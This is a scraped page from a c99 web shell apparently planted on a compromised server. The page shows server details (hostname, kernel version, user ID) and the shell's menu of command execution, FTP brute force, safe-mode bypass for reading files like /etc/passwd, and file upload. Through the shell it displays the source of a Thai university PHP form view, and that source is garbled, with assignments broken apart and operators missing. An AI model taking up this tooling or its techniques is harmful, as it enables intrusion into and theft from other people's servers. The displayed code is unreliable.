!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/esa/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_plandetail_t3.php (10.21 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php //echo link_tag('css/nav_esa.css');?>
<script language="javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
<script type="text/javascript">
    jQuery(document).ready(function(){
        //get_option();

        jQuery('#atb_type1').click(function() {
          jQuery('#atb1').show('slow');
                jQuery('#atb1').show('slow');
                jQuery('#atb2').hide('slow');
        });
        jQuery('#atb_type2').click(function() {
          jQuery('#atb1').show('slow');
                jQuery('#atb2').show('slow');
                jQuery('#atb1').hide('slow');
        });
    });

var auto_num =0;
function addRow () {
    var target = jQuery("#cur_id");
    var sy = jQuery("#sy_id").clone();
    var childObj = target.clone();
    var text = target.parents("td:first").prev().text();
    var no = jQuery(":input[name='cur_id\[\]']").length +1;
    var color = target.parents("tr:first").prev().attr("bgcolor");
    text = text.replace(/[0-9]/,"");
    var html = "<tr bgcolor=\""+color+"\">";
        html += "<td><b>หลักสูตร&nbsp;</b>";
        html += "<select name=\"cur_id[]\" class=\"cur_id\" id=\"cur_id_"+no+"\">";
        html +=  childObj.html();
        html += "</select>";
        html += "<b> ชั้นปี </b><select name=\"sy_id[]\" class=\"sy_id\" id=\"sy_id_"+no+"\">";
        html += sy.html();
        html += "</select>";
        html += " <input type=\"text\" name=\"num_std[]\" id=\"num_std_"+no+"\" size=\"5\"/> <b>คน</b>";
        html += "</td>"
        html += "</tr>";
        jQuery(html).insertAfter(jQuery(":input[name='cur_id\[\]']:last").parents("tr:first"));
        jQuery(":input[id='cur_id_"+no+"']").val("");
        jQuery(":input[id='sy_id_"+no+"']").val("");
}

function addRow2 () {
    var target = jQuery("#tg_sc_id");
    var childObj = target.clone();
    var text = target.parents("td:first").prev().text();
    var no = jQuery(":input[name='tg_sc_id\[\]']").length +1;
    var color = target.parents("tr:first").prev().attr("bgcolor");
    text = text.replace(/[0-9]/,"");
    var html = "<tr bgcolor=\""+color+"\">";
        html += "<td>";
        html += "<select name=\"tg_sc_id[]\" class=\"tg_sc_id\" id=\"tg_sc_id_"+no+"\">";
        html +=  childObj.html();
        html += "</select>";
        html += " <input type=\"text\" name=\"num_smo[]\" id=\"num_smo_"+no+"\" size=\"5\"/> <b>คน</b>";
        html += "</td>"
        html += "</tr>";
        jQuery(html).insertAfter(jQuery(":input[name='tg_sc_id\[\]']:last").parents("tr:first"));
        jQuery(":input[id='tg_sc_id_"+no+"']").val("");
}


function change_smo () {
    var smo_id = jQuery("#mb_smo_id").val();
    var url = "<?php echo site_url($this->config->item('sa_folder'));?>/smo_club/get_club/"+smo_id;
//alert(url);
    xmlhttp = newXmlHttp();
    xmlhttp.open("GET", url, false);
    xmlhttp.send(null); 
    if (xmlhttp.readyState==4 && xmlhttp.status==200) {
        var ret_text = xmlhttp.responseText;
        document.getElementById('show_cl').innerHTML= ret_text;
    }
}

</script>
<?php 
$tg_sc_id 
'';
$smo_type '';
$std_type '';
$teach_id '';
$teach_num '';
$teach_type '';
$off_id '';
$off_num '';
$off_type '';
$other_id '';
$other_num '';
$other_type '';
    if(
$rs_tg->num_rows()>0){
        foreach (
$rs_tg->result() as $row) {
            if (
$row->tg_type == 5) {
                
$tg_sc_id $row->tg_sc_id;
                
$smo_type $row->tg_type;
            }
            if (
$row->tg_type == 1) {
                
$std_type $row->tg_type;
            }
            if (
$row->tg_type == 2) {
                
$teach_id $row->tg_id;
                
$teach_num $row->tg_num;
                
$teach_type $row->tg_type;
            }
            if (
$row->tg_type == 3) {
                
$off_id $row->tg_id;
                
$off_num $row->tg_num;
                
$off_type $row->tg_type;
            }
            if (
$row->tg_type == 4) {
                
$other_id $row->tg_id;
                
$other_num $row->tg_num;
                
$other_type $row->tg_type;
            }
        }
    }
    
?>
<?php 
//$mpj = $qu_mpj->row(); ?>
<table border='0' width="100%">
<tr><td>
<?php
    $_image_add 
= array(
                    
'src' => 'images/esa/add_2.gif',         
                    
'width' => '15',
                    
'height' => '15',
                    
'border' => '0',
                    
'title' => 'เพิ่มกลุ่มนักศึกษา',
                    
'align' => 'absmiddle',
                    
'onClick' => 'addRow()',
                    
'onmouseover' => "this.style.cursor='pointer'"
    
);
    
$_image_add2 = array(
                    
'src' => 'images/esa/add_2.gif',         
                    
'width' => '15',
                    
'height' => '15',
                    
'border' => '0',
                    
'title' => 'สมาชิกสโมสร/ชมรม',
                    
'align' => 'absmiddle',
                    
'onClick' => 'addRow2()',
                    
'onmouseover' => "this.style.cursor='pointer'"
    
);
    
$_image_del = array(
                    
'src' => 'images/delete.png',         
                    
'width' => '15',
                    
'height' => '15',
                    
'border' => '0',
                    
'title' => 'ลบข้อมูล',
                    
'onmouseover' => "this.style.cursor='pointer'"
    
);
?>
<?php 
// กลุ่มเป้าหมาย
echo form_open($this->config->item('sa_folder').'project/add_edit_target', array("name" => "myform""id" => "myform"));?>

    <table class='szone2' width="100%" border="0" align="left">
<input type="hidden" name="mpj_id" value="<?php echo (isset($mpj_id))?$mpj_id:''?>" />
<input type="hidden" name="acp_id" value="<?php echo (isset($acp_id))?$acp_id:''?>" />
    <tr >
        <th valign="top">&nbsp;&nbsp;<font size="2"><?php echo form_checkbox("smo"'5'set_value("smo",$smo_type))." สมาชิกสโมสร/ชมรม ";?></font><?php echo img($_image_add2);?></th>
        <td>
            <table>
<?php
                $index 
1;
                if (
$rs_tg->num_rows()>0) {
                    foreach (
$rs_tg->result() as $row_smo) {
                        
$smo_type 'N';
                        if (
$row_smo->tg_type == 5) {
?>
                            <tr><td>
                            <?=form_dropdown('tg_sc_id[]'$rs_smoset_value('tg_sc_id[]',$row_smo->tg_sc_id) ,"id=\"tg_sc_id\""); ?>
                            <input type="text" name="num_smo[]" id="num_smo" value="<?php echo set_value('num_smo[]',$row_smo->tg_num);?>" size="5"> <b>คน</b>
                            <?php echo anchor($this->config->item('sa_folder').'project/delete_tg/'.$row_smo->tg_id.'/'.$row_smo->tg_dpj_id,img($_image_del),array('onclick'=>"return confirm('ต้องการลบแถวนี้ใช่หรือไม่');")); ?>
                            </td></tr>
<?php
                            $index
++;
                            
$smo_type 'Y';
                        }
                    }
                    if (
$smo_type == 'N') {
?>
                        <tr><td>
                        <?=form_dropdown('tg_sc_id[]'$rs_smoset_value('tg_sc_id[]') ,"id=\"tg_sc_id\""); ?>
                        <input type="text" name="num_smo[]" id="num_smo" value="<?php echo set_value('num_smo[]');?>" size="5"> <b>คน</b></td></tr>
<?php
                    
}
                } else {
?>
                <tr><td>
                <?=form_dropdown('tg_sc_id[]'$rs_smoset_value('tg_sc_id[]') ,"id=\"tg_sc_id\""); ?>
                <input type="text" name="num_smo[]" id="num_smo" value="<?php echo set_value('num_smo[]');?>" size="5"> <b>คน</b></td></tr>
<?php
                
}
?>
    </table>
    <?php echo form_error('tg_sc_id[]');?>
        </td>
    </tr>
    <tr >
<!-- , set_value('stp_stg_id',getval('stp_stg_id',$qu_sb))-->
        <th align="left" width="20%" valign="top">&nbsp;&nbsp;<font size="2"><?php echo form_checkbox("std"'1'set_value("std",$std_type))." นักศึกษา ";?></font>
        <?php echo img($_image_add);?></th>
        <td>
        <table>
<?php
                        $index 
1;
                        if (
$rs_tg->num_rows()>0) {
                            
$ch_type 'N';
                            foreach (
$rs_tg->result() as $row_tg) {
                                if (
$row_tg->tg_type == 1) {
?>
                        <tr class='szone'><td>
                        <b>หลักสูตร </b> <?=form_dropdown('cur_id[]'$rs_curset_value('cur_id[]',$row_tg->tg_cur_id) ,"id=\"cur_id\""); ?>
                        <b>ชั้นปี </b> <?=form_dropdown('sy_id[]'$rs_syset_value('sy_id[]',$row_tg->tg_tm_id) ,"id=\"sy_id\""); ?> 
                        <input type="text" name="num_std[]" id="num_std" value="<?php echo set_value('num_std[]',$row_tg->tg_num);?>" size="5"> <b>คน</b>
                        <?php echo anchor($this->config->item('sa_folder').'project/delete_tg/'.$row_tg->tg_id.'/'.$row_tg->tg_dpj_id,img($_image_del),array('onclick'=>"return confirm('ต้องการลบแถวนี้ใช่หรือไม่');")); ?>
                        </td></tr>
<?php
                                $index
++;
                                
$ch_type 'Y';
                                }
                            }
                            if (
$ch_type == 'N') {
?>
                            <tr class='szone'><td>
                            <b>หลักสูตร </b> <?=form_dropdown('cur_id[]'$rs_curset_value('cur_id[]') ,"id=\"cur_id\""); ?>
                            <b>ชั้นปี </b> <?=form_dropdown('sy_id[]'$rs_syset_value('sy_id[]') ,"id=\"sy_id\""); ?> 
                            <input type="text" name="num_std[]" id="num_std" value="<?php echo set_value('num_std[]');?>" size="5"> <b>คน</b>
                            </td></tr>
<?php
                            
}
                        } else {
?>
                        <tr class='szone'><td>
                        <b>หลักสูตร </b> <?=form_dropdown('cur_id[]'$rs_curset_value('cur_id[]') ,"id=\"cur_id\""); ?>
                        <b>ชั้นปี </b> <?=form_dropdown('sy_id[]'$rs_syset_value('sy_id[]') ,"id=\"sy_id\""); ?> 
                        <input type="text" name="num_std[]" id="num_std" value="<?php echo set_value('num_std[]');?>" size="5"> <b>คน</b></td></tr>
<?php
                        
}
?>
        </table>
        </td>
    </tr>
    <tr >

        <th align="left">&nbsp;&nbsp;<font size="2"><?php echo form_checkbox("teach"'2'set_value("teach",$teach_type))." อาจารย์ ";?></font></th>
        <td><input type="text" name="num_teach" value="<?php echo set_value('num_teach',$teach_num);?>" size="5"> <b>คน</b></td>
    </tr>
    <tr >

        <th align="left">&nbsp;&nbsp;<font size="2"><?php echo form_checkbox("off"'3'set_value("off",$off_type))." เจ้าหน้าที่ ";?></font></th>
        <td><input type="text" name="num_off" value="<?php echo set_value('num_off',$off_num);?>" size="5"> <b>คน</b></td>
    </tr>
    <tr >

        <th align="left">&nbsp;&nbsp;<font size="2"><?php echo form_checkbox("other"'4'set_value("other",$other_type))." อื่นๆ ";?></font></th>
        <td><input type="text" name="num_other" value="<?php echo set_value('num_other',$other_num);?>" size="5"> <b>คน</b></td>
    </tr>
     <tr class='szone2'>
        <td colspan="3" height="22" align="center" bgcolor="#D1DCF3"><input type="submit" name="add" value="บันทึก" /><?php echo form_error('sb_name'); ?></td>
    </tr>
    <tr >
        <td colspan="2" height="22"></td>
    </tr>

</table>
            <?php echo form_close();?>
</td></tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0102 ]--